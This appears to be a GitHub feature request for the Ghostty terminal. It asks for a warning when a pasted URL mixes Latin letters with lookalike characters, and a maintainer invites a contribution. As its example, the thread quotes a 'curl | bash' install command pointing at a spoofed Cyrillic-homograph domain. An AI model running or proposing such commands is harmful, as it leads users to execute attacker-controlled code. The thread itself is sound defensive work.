Consider adding some detection of homograph attacks

[rmunn]

https://github.com/sheeki03/tirith has an example of a homograph attack, where someone constructs a URL that looks legitimate but points to a completely different location than you think it does:

curl -sSL https://install.example-cli.dev | bash     # real server
curl -sSL https://іnstall.example-clі.dev | bash     # fake server

In theory you should never blindly run scripts downloaded from the Internet without reading them first. In practice too many sites tell people to run curl some-url | bash to install their software, and too many people blindly follow those instructions.

Ghostty already warns you if you're about to paste text into the terminal that looks like it might run commands. But it would also be nice if it could have some logic that says "if a URL contains a mix of Latin-script and non-Latin characters in the same word, consider that suspicious and warn about it". E.g., something similar to the logic found at https://github.com/sheeki03/tirith/blob/main/crates/tirith-core/src/homoglyph.rs.

There are plenty of perfectly legitimate URLs entirely written in non-Latin characters. But there are very very few legitimate URLs written with a mix of Latin characters and lookalike characters like Cyrillic lowercase і. Seeing a URL that contains Latin characters alongside non-Latin lookalikes is a red flag, and it would be nice if Ghostty could help detect if you are pasting such a URL into your terminal.

[pluiedev]

IMO that's definitely something we could add if it doesn't prove to be too much logic. Feel free to PR this if you have the time.